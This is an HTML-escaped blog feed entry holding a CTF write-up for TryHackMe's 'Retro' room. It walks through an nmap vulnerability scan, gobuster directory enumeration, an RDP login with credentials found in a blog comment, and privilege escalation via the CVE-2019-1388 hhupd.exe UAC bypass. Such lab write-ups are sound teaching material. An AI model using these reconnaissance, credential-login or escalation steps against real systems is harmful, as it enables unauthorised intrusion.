                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/retro&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Retro” on TryHackMe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;initial-reconnaissance&quot;&gt;Initial reconnaissance&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#initial-reconnaissance&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This CTF is an earlier version of &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-12-08&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-12-08&quot;&gt;Blaster&lt;/a&gt; without the step-by-step nature of that room. Not 100% sure what the differences are.&lt;/p&gt;
&lt;p&gt;The target IP is 10.10.20.185.&lt;/p&gt;
&lt;p&gt;As with Blaster, we’ll start out by running an &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; scan:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oA&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; retro&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sS&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -script&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; vuln&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;          -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.20.185&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This gives us:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.92 scan initiated Sun Jan  2 19:34:48 2022 as: nmap -v -oA retro -Pn -A -T4 -sS -script vuln -p- 10.10.20.185
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 10.10.20.185
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.
|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (90%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2016 (89%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.013 days (since Sun Jan  2 19:29:09 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   37.05 ms  10.13.0.1
2   ... 3
4   180.52 ms 10.10.20.185

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  2 19:47:21 2022 -- 1 IP address (1 host up) scanned in 753.31 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So we’ve got IIS and RDP running. Let’s start by taking a look around IIS.&lt;/p&gt;
&lt;h2 id=&quot;flag-1-the-hidden-directory&quot;&gt;Flag 1: The hidden directory&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#flag-1-the-hidden-directory&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;As with Blaster, we just have the default IIS welcome page. So let’s follow up with &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; since we know from the flag list that there’s a hidden directory.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;gobuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; dir&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-w&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.20.185/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;h2 id=&quot;flag-2-usertxt&quot;&gt;Flag 2: user.txt&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#flag-2-usertxt&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Visiting the hidden directory reveals the same retro arcade website as Blaster. (I’m noticing a parallel here… I suspect that the rest of the CTF will also be the same, though I’m going to see if I can do this one with less guessing.)&lt;/p&gt;
&lt;p&gt;All of the posts are by “Wade”. I hadn’t noticed it the first time, but the “&lt;a href=&quot;https://en.wikipedia.org/wiki/Ready_Player_One&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Ready Player One&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;” post is actually suggestive that either Wade’s username or password is “Parzival”.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The comment immediately afterward seems to confirm this.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Leaving myself a note here just in case I forget how to spell it: parzival&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Theoretically I should use this information to generate a wordlist (who knows what permutations Wade is applying to “Parzival”, and whether this is Wade’s username or password). There’s a few Kali Linux tools that could be used to harvest words from the hidden site and generate various common permutations, but all of these will result in quite a long list.&lt;/p&gt;
&lt;p&gt;In the real world, this is what I’d probably have to do. But since I kinda already know how this is going to shake out, let’s just skip ahead to logging in with XFreeRDP.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;xfreerdp&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /dynamic-resolution&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; +clipboard&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /cert:ignore&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;         /v:10.10.20.185&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /u:Wade&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /p:parzival&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Unsurprisingly, this works. The user.txt file on the desktop contains the second flag (which is different than in Blaster!).&lt;/p&gt;
&lt;h2 id=&quot;flag-3-roottxt&quot;&gt;Flag 3: root.txt&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#flag-3-roottxt&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This flag is probably in &lt;code&gt;C:\Users\Administrator\Desktop\root.txt&lt;/code&gt;. But now things are diverging a bit…&lt;/p&gt;
&lt;p&gt;Wade has Google Chrome installed in this version of the CTF, and no other files are on the desktop.&lt;/p&gt;
&lt;p&gt;But poking around a bit reveals that things aren’t too far off Blaster.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;There’s an hhupd.exe executable in the Recycle Bin.&lt;/li&gt;
&lt;li&gt;Chrome has a single bookmark for “&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2019-1388&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;NVD - CVE-2019-1388&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;”.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Of course, the TryHackMe machine doesn’t have internet access, but we can follow this link locally. Moreover, searching for hhupd reveals that &lt;a href=&quot;https://www.nagenrauft-consulting.com/2019/11/21/cve-2019-1388-hhupd-exe/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;this is a program that can be used to perform the attack&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;; that page helpfully links to &lt;a href=&quot;https://www.youtube.com/watch?v=3BQKpPNlTSo&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;a YouTube video demonstrating how to leverage hhupd.exe in exactly this way&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The attack works somewhat differently on this system than in Blaster (or the demonstration video), however. Instead of opening up an Internet Explorer window outside of the secure desktop, IE is opened up &lt;em&gt;on&lt;/em&gt; the UAC desktop itself, and all interaction needs to take place there (we also get a choice of using IE or Chrome…). Still, overall things work more-or-less as we’d expect, and we can use the resulting elevated command prompt to read &lt;code&gt;C:\Users\Administrator\Desktop\root.txt.txt&lt;/code&gt; (note the extra .txt) to obtain the final flag.&lt;/p&gt;
&lt;p&gt;(I kinda feel like I cheated now, since I did Blaster first without realizing that this room was almost &lt;em&gt;exactly&lt;/em&gt; the same.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 1 h 16 min&lt;/p&gt; ]]></description>
    <pubDate>Sun, 02 Jan 2022 00:00:00 GMT</pubDate>
  </item>
    </channel>
  </rss>